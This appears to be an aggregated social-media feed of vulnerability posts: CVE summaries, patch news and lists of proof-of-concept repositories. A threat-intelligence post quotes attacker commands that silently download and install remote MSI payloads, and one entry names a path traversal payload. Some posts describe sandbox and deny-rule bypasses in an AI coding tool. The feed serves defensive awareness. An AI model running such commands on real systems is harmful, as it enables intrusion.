π CVE-2025-15319 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Endpoint Configuration Toolset Solution.
π https://www.thehackerwire.com/vulnerability/CVE-2025-15319/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-15319 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Endpoint Configuration Toolset Solution.
π https://www.thehackerwire.com/vulnerability/CVE-2025-15319/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T22:39:51
1 posts
π CVE-2026-25791 - High (7.5)
Sliver is a command and control framework that uses a custom Wireguard netstack. Prior to 1.7.0, the DNS C2 listener accepts unauthenticated TOTP bootstrap messages and allocates server-side DNS sessions without validating OTP values, even when En...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25791/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:55:30.093000
2 posts
Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- Git default branch: Git 3.0 will make "main" the default branch by end of 2026.
- COLRv1 in WebKit: COLRv1 font rendering support in WebKit.
- Linux kernel 7.0: io_uring gains filtering support (cBPF opcodes) and per-task filters.
- AWS Lambda CVEs: 29 CVEs across 27 Lambda base images; CVE-2026-25639 affecting base images.
- Post-OOP: Move [1/2]
π CVE-2026-25639 - High (7.5)
Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger th...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25639/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:55:30.093000
1 posts
π CVE-2026-25761 - High (8.8)
Super-linter is a combination of multiple linters to run as a GitHub Action or standalone. From 6.0.0 to 8.3.0, the Super-linter GitHub Action is vulnerable to command injection via crafted filenames. When this action is used in downstream GitHub ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25761/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:54:21.847000
2 posts
π CVE-2025-69212 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-69212/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2025-69212 - High (8.8)
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-69212/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:55.263000
3 posts
2 repos
βΌοΈ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##βΌοΈ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##BeyondTrust fixes easy-to-exploit pre-auth RCE vulnerability in remote access tools (CVE-2026-1731)
https://www.helpnetsecurity.com/2026/02/09/beyondtrust-remote-access-vulnerability-cve-2026-1731/
#RemoteAccess #PrivilegedAccessManagement #Enterprise #Cybersecurity #CVE
##updated 2026-02-09T16:08:35.290000
1 posts
π CVE-2026-25847 - High (8.2)
In JetBrains PyCharm before 2025.3.2 a DOM-based XSS on Jupyter viewer page was possible
π https://www.thehackerwire.com/vulnerability/CVE-2026-25847/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
3 posts
π΄ CVE-2026-2234 - Critical (9.1)
C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2234 - Critical (9.1)
C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-2234 - Critical (9.1)
C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read and modify any user's mail content.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2234/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
π΄ CVE-2026-22906 - Critical (9.8)
User credentials are stored using AESβECB encryption with a hardcoded key. An unauthenticated remote attacker obtaining the configuration file can decrypt and recover plaintext usernames and passwords, especially when combined with the authentic...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22906/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T16:08:35.290000
1 posts
π΄ CVE-2026-22904 - Critical (9.8)
Improper length handling when parsing multiple cookie fields (including TRACKID) allows an unauthenticated remote attacker to send oversized cookie values and trigger a stack buffer overflow, resulting in a denialβofβservice condition and poss...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22904/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T15:30:37
1 posts
π CVE-2025-59023 - High (8.2)
Crafted delegations or IP fragments can poison cached delegations in Recursor.
π https://www.thehackerwire.com/vulnerability/CVE-2025-59023/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T15:30:37
1 posts
π CVE-2025-10465 - High (8.8)
Unrestricted Upload of File with Dangerous Type vulnerability in Birtech Information Technologies Industry and Trade Ltd. Co. Sensaway allows Upload a Web Shell to a Web Server.This issue affects Sensaway: through 09022026.
NOTE: The vendor was c...
π https://www.thehackerwire.com/vulnerability/CVE-2025-10465/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T14:51:42.203000
1 posts
π΄ CVE-2026-25722 - Critical (9.1)
Claude Code is an agentic coding tool. Prior to version 2.0.57, Claude Code failed to properly validate directory changes when combined with write operations to protected folders. By using the cd command to navigate into sensitive directories like...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25722/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T14:47:41.783000
1 posts
π CVE-2026-25724 - High (7.5)
Claude Code is an agentic coding tool. Prior to version 2.1.7, Claude Code failed to strictly enforce deny rules configured in settings.json when accessing files through symbolic links. If a user explicitly denied Claude Code access to a file (suc...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25724/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T12:30:30
1 posts
π΄ CVE-2026-25848 - Critical (9.1)
In JetBrains Hub before 2025.3.119807 authentication bypass allowing administrative actions was possible
π https://www.thehackerwire.com/vulnerability/CVE-2026-25848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:28
1 posts
π CVE-2025-7799 - High (8.6)
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Zirve Information Technologies Inc. E-Taxpayer Accounting Website allows Reflected XSS.This issue affects e-Taxpayer Accounting Website: t...
π https://www.thehackerwire.com/vulnerability/CVE-2025-7799/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:28
1 posts
π΄ CVE-2026-22903 - Critical (9.8)
An unauthenticated remote attacker can send a crafted HTTP request containing an overly long SESSIONID cookie. This can trigger a stack buffer overflow in the modified lighttpd server, causing it to crash and potentially enabling remote code execu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22903/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:27
3 posts
π CVE-2026-2236 - High (7.5)
C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2236 - High (7.5)
C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-2236 - High (7.5)
C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
π https://www.thehackerwire.com/vulnerability/CVE-2026-2236/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T09:30:27
2 posts
π CVE-2026-22905 - High (7.5)
An unauthenticated remote attacker can bypass authentication by exploiting insufficient URI validation and using path traversal sequences (e.g., /js/../cgi-bin/post.cgi), gaining unauthorized access to protected CGI endpoints and configuration dow...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-22905 - High (7.5)
An unauthenticated remote attacker can bypass authentication by exploiting insufficient URI validation and using path traversal sequences (e.g., /js/../cgi-bin/post.cgi), gaining unauthorized access to protected CGI endpoints and configuration dow...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T21:42:47
2 posts
π΄ CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T19:14:34
1 posts
π΄ CVE-2026-25725 - Critical (10)
Claude Code is an agentic coding tool. Prior to version 2.1.2, Claude Code's bubblewrap sandboxing mechanism failed to properly protect the .claude/settings.json configuration file when it did not exist at startup. While the parent directory was m...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25725/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-06T18:30:43
2 posts
CVE-2026-2103 - Infor Syteline ERP
https://blog.blacklanternsecurity.com/p/cve-2026-2103-infor-syteline-erp
##CVE-2026-2103 - Infor Syteline ERP - Keys Included: No Assembly Required https://blog.blacklanternsecurity.com/p/cve-2026-2103-infor-syteline-erp
##updated 2026-02-06T17:37:28.723000
2 posts
2 repos
Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##updated 2026-02-06T16:45:15.323000
2 posts
1 repos
Here's a summary of the latest technology and cybersecurity news from the last 24-48 hours:
Major tech firms globally plan to invest over $650 billion in AI infrastructure this year. OpenAI has launched "Frontier," a new enterprise platform for AI agents.
In cybersecurity, CISA mandated US federal agencies replace unsupported edge devices within 18 months due to state-sponsored exploitation. Russia's APT28 targeted European entities with a new Microsoft Office exploit. A critical SmarterMail flaw (CVE-2026-24423) is actively exploited in ransomware attacks. (Feb 6-7, 2026).
##Global news highlights include the kickoff of the 2026 Winter Olympics in Italy (Feb 7). In technology, OpenAI launched its Frontier enterprise AI agent platform. Apple acquired AI startup Q.AI for $2B, while Google reported significant AI-driven profit gains. Intel and AMD warned of server CPU shortages impacting China due to AI demand. The EU is also scrutinizing TikTok's "addictive design".
Cybersecurity saw CISA warn of a critical SmarterMail vulnerability (CVE-2026-24423) actively exploited in ransomware campaigns (Feb 7). Italian authorities thwarted Russian cyberattacks targeting government and Olympic-related websites. A rise in AI-driven phishing attacks was also reported.
##updated 2026-02-06T09:30:35
6 posts
1 repos
Fortinetβs CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
π¬ How are you reducing blast radius for management infrastructure?
π Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution
Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.
**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-fortinet-forticlientems-allows-remote-code-execution-7-8-j-i-r/gD2P6Ple2L
Fortinetβs CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
π¬ How are you reducing blast radius for management infrastructure?
π Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution
Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.
**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-fortinet-forticlientems-allows-remote-code-execution-7-8-j-i-r/gD2P6Ple2L
updated 2026-02-05T13:01:23.843000
1 posts
9 repos
https://github.com/basekilll/CVE-2025-24054_PoC
https://github.com/S4mma3l/CVE-2025-24054
https://github.com/Yuri08loveElaina/CVE-2025-24054_POC
https://github.com/Untouchable17/CVE-2025-24054
https://github.com/moften/CVE-2025-24054
https://github.com/Wind010/CVE-2025-24054_PoC
https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC
π¨ New Exploit: Windows 10.0.17763.7009 - spoofing vulnerability
π CVE: CVE-2025-24054
π€ Author: beatrizfn
π https://www.exploit-db.com/exploits/52480
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-24054
##updated 2026-02-04T21:09:38
3 posts
1 repos
https://github.com/otakuliu/Expression-Sandbox-Escape-Simulation-Lab
Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm https://lobste.rs/s/wepiig #security
https://hetmehta.com/posts/n8n-type-confusion-rce/
Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm https://lobste.rs/s/wepiig #security
https://hetmehta.com/posts/n8n-type-confusion-rce/
βͺ Critical bug in n8n opened the door to RCE
π¨οΈ A critical vulnerability has been discovered in the n8n workflow automation platform that allowed arbitrary command execution on the server side. The issue, identified as CVE-2026-25049 (scored 9.4 on the CVSS scale), affects the sandbox mechanism that is supposed to isolate the execution of JavaScrβ¦
##updated 2026-02-04T16:34:21.763000
2 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws
A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilitiesβCVE-2026-1281 and CVE-2026-1340βattackers areβ¦
##βReports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISAβs Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.β
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##updated 2026-02-04T02:00:02.030000
1 posts
----------------
π― Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
β’ Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
β’ Observed staged installers and deployment vectors:
β’ msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
β’ msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
β’ Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
β’ Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
β’ Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
β’ Download: MSI payloads hosted on third-party services (Catbox, Supabase).
β’ Execution: Silent MSI installation via spawned command process from WHD service chain.
β’ Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
β’ C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
β’ Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
β’ Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
β’ Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
β’ Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
β’ Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
πΉ solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
π Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##updated 2026-02-02T18:38:55.073000
2 posts
4 repos
https://github.com/guiimoraes/CVE-2025-15467
https://github.com/balgan/CVE-2025-15467
This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##updated 2026-01-30T13:28:18.610000
2 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
Stealth Cyber Attack Targets Ivanti EPMM: Dormant Backdoors Found Exploiting Critical Flaws
A new, stealthy cyber campaign has emerged, targeting Ivanti Endpoint Manager Mobile (EPMM) systems since February 4, 2026. Unlike conventional ransomware or data-stealing attacks, this operation is designed to stay hidden, silently establishing long-term access for future malicious activity. Exploiting two critical vulnerabilitiesβCVE-2026-1281 and CVE-2026-1340βattackers areβ¦
##βReports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISAβs Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.β
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##updated 2026-01-29T18:32:39
2 posts
@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 β Published: 2025-12-31
##@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 β Published: 2025-12-31
##updated 2026-01-27T16:16:55.327000
1 posts
2 repos
https://github.com/MaxMnMl/smartermail-CVE-2026-23760-poc
https://github.com/hilwa24/CVE-2026-23760_SmarterMail-Auth-Bypass-and-RCE
Massive SmarterTools Breach Exposed Through Critical SmarterMail Vulnerability
Cybersecurity professionals are sounding the alarm after hackers exploited a critical vulnerability in SmarterMail, leaving the SmarterTools network exposed to a serious breach. The incident underscores the growing threats facing enterprise email systems, especially when security patches are delayed or ignored. Attackers targeted CVE-2026-23760 in an unpatched SmarterMail virtual machine,β¦
##updated 2026-01-27T14:59:34.073000
2 posts
I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.
The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security
More information about the issue:
https://github.com/shaarli/Shaarli/security/advisories/GHSA-g3xq-mj52-f8pg
https://security-tracker.debian.org/tracker/CVE-2026-24476
I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.
The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security
More information about the issue:
https://github.com/shaarli/Shaarli/security/advisories/GHSA-g3xq-mj52-f8pg
https://security-tracker.debian.org/tracker/CVE-2026-24476
updated 2026-01-13T18:31:17
1 posts
Windows Error Reporting Flaw Lets Standard Users Reach SYSTEM: Inside CVE-2026-20817
Introduction A quiet but deeply dangerous vulnerability inside Windows Error Reporting (WER) has exposed a new path for local privilege escalation, allowing ordinary users to obtain near-SYSTEM level control. Tracked as CVE-2026-20817 and patched by Microsoft in January 2026, the flaw sits in a core crash-handling mechanism that runs by default on nearly every Windows machine. While noβ¦
##updated 2026-01-08T16:28:27.603000
1 posts
17 repos
https://github.com/NishanthAnand21/CVE-2023-4911-PoC
https://github.com/Billar42/CVE-2023-4911
https://github.com/Diego-AltF4/CVE-2023-4911
https://github.com/Green-Avocado/CVE-2023-4911
https://github.com/chaudharyarjun/LooneyPwner
https://github.com/guffre/CVE-2023-4911
https://github.com/snurkeburk/Looney-Tunables
https://github.com/KillReal01/CVE-2023-4911
https://github.com/xiaoQ1z/CVE-2023-4911
https://github.com/RickdeJager/CVE-2023-4911
https://github.com/puckiestyle/CVE-2023-4911
https://github.com/silent6trinity/looney-tuneables
https://github.com/teraGL/looneyCVE
https://github.com/ruycr4ft/CVE-2023-4911
https://github.com/leesh3288/CVE-2023-4911
https://github.com/KernelKrise/CVE-2023-4911
https://github.com/hadrian3689/looney-tunables-CVE-2023-4911
π¨ New Exploit: glibc 2.38 - Buffer Overflow
π CVE: CVE-2023-4911
π€ Author: Beatriz Fresno Naumova
π https://www.exploit-db.com/exploits/52479
#ExploitDB #InfoSec #CyberSecurity #CVE-2023-4911
##updated 2025-11-04T00:31:52
1 posts
#OT #Advisory VDE-2025-109
Phoenix Contact: Unbounded growth of the session cache in TCP encapsulation service in FL MGUARD 2xxx and 4xxx firmware
The OpenSSL library used in the affected products is vulnerable to an unbounded growth of the session cache in the TLSv1.3 implementation.
#CVE CVE-2024-2511
https://certvde.com/en/advisories/vde-2025-109/
#CSAF https://phoenixcontact.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2025-109.json
##updated 2025-11-03T19:16:09.190000
1 posts
here's a straight up vuln that could let a PDF inject arbitrary code into the Acrobat Reader process with some heap grooming: zeropath.com/blog/cve-202...
Adobe Acrobat Reader CVE-2025-...
updated 2025-10-28T14:14:01.610000
2 posts
7 repos
https://github.com/rxwx/CVE-2018-0802
https://github.com/Abdibimantara/Maldoc-Analysis
https://github.com/Palvinder-Singh/PS_CVE2018-0802
https://github.com/Ridter/RTF_11882_0802
https://github.com/roninAPT/CVE-2018-0802
Observed campaign summary:
Initial Access:
β’ Phishing emails with Excel (.XLAM) attachments
Execution:
β’ CVE-2018-0802 (EQNEDT32.EXE)
β’ HTA β mshta.exe
β’ PowerShell in-memory decoding
Deployment:
β’ Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
β’ Process hollowing into Msbuild.exe
β’ AES-encrypted C2 packets
β’ delimited command protocol
β’ Plugin-based architecture (50+ modules)
Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.
This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.
Blue teamers - which telemetry source provides the strongest signal here?
Follow @technadu for ongoing malware analysis and threat intelligence coverage.
#Infosec #MalwareResearch #ThreatIntel #XWorm #RAT #ProcessInjection #EDR #DFIR #CyberDefense #BlueTeam #TechNadu
##Observed campaign summary:
Initial Access:
β’ Phishing emails with Excel (.XLAM) attachments
Execution:
β’ CVE-2018-0802 (EQNEDT32.EXE)
β’ HTA β mshta.exe
β’ PowerShell in-memory decoding
Deployment:
β’ Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
β’ Process hollowing into Msbuild.exe
β’ AES-encrypted C2 packets
β’ delimited command protocol
β’ Plugin-based architecture (50+ modules)
Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.
This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.
Blue teamers - which telemetry source provides the strongest signal here?
Follow @technadu for ongoing malware analysis and threat intelligence coverage.
#Infosec #MalwareResearch #ThreatIntel #XWorm #RAT #ProcessInjection #EDR #DFIR #CyberDefense #BlueTeam #TechNadu
##updated 2025-10-22T00:34:26
4 posts
46 repos
https://github.com/0xray5c68616e37/cve-2025-53770
https://github.com/yosasasutsut/Blackash-CVE-2025-53770
https://github.com/behnamvanda/CVE-2025-53770-Checker
https://github.com/chrisalee27-dotcom/SOC-Incident-Response-Portfolio
https://github.com/go-bi/sharepoint-CVE-2025-53770
https://github.com/imbas007/CVE-2025-53770-Vulnerable-Scanner
https://github.com/zach115th/ToolShellFinder
https://github.com/anwakub/CVE-2025-53770
https://github.com/daryllundy/CVE-2025-53770
https://github.com/hazcod/CVE-2025-53770
https://github.com/soltanali0/CVE-2025-53770-Exploit
https://github.com/r3xbugbounty/CVE-2025-53770
https://github.com/GreenForceNetworks/Toolshell_CVE-2025-53770
https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/paolokappa/SharePointSecurityMonitor
https://github.com/exfil0/CVE-2025-53770
https://github.com/RukshanaAlikhan/CVE-2025-53770
https://github.com/Bluefire-Redteam-Cybersecurity/bluefire-sharepoint-cve-2025-53770
https://github.com/grupooruss/CVE-2025-53770-Checker
https://github.com/Agampreet-Singh/CVE-2025-53770
https://github.com/3a7/CVE-2025-53770
https://github.com/ZephrFish/CVE-2025-53770-Scanner
https://github.com/nisargsuthar/suricata-rule-CVE-2025-53770
https://github.com/CyprianAtsyor/ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend
https://github.com/n1chr0x/ZeroPoint
https://github.com/Cameloo1/sharepoint-toolshell-micro-postmortem
https://github.com/tripoloski1337/CVE-2025-53770-scanner
https://github.com/Udyz/CVE-2025-53770-Exploit
https://github.com/peiqiF4ck/WebFrameworkTools-5.5-enhance
https://github.com/saladin0x1/CVE-2025-53770
https://github.com/MuhammadWaseem29/CVE-2025-53770
https://github.com/Rabbitbong/OurSharePoint-CVE-2025-53770
https://github.com/Michaael01/LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell
https://github.com/siag-itsec/CVE-2025-53770-Hunting
https://github.com/bharath-cyber-root/sharepoint-toolshell-cve-2025-53770
https://github.com/AdityaBhatt3010/CVE-2025-53770-SharePoint-Zero-Day-Variant-Exploited-for-Full-RCE
https://github.com/bossnick98/-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE
https://github.com/bitsalv/ToolShell-Honeypot
https://github.com/0x-crypt/CVE-2025-53770-Scanner
https://github.com/Sec-Dan/CVE-2025-53770-Scanner
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/Immersive-Labs-Sec/SharePoint-CVE-2025-53770-POC
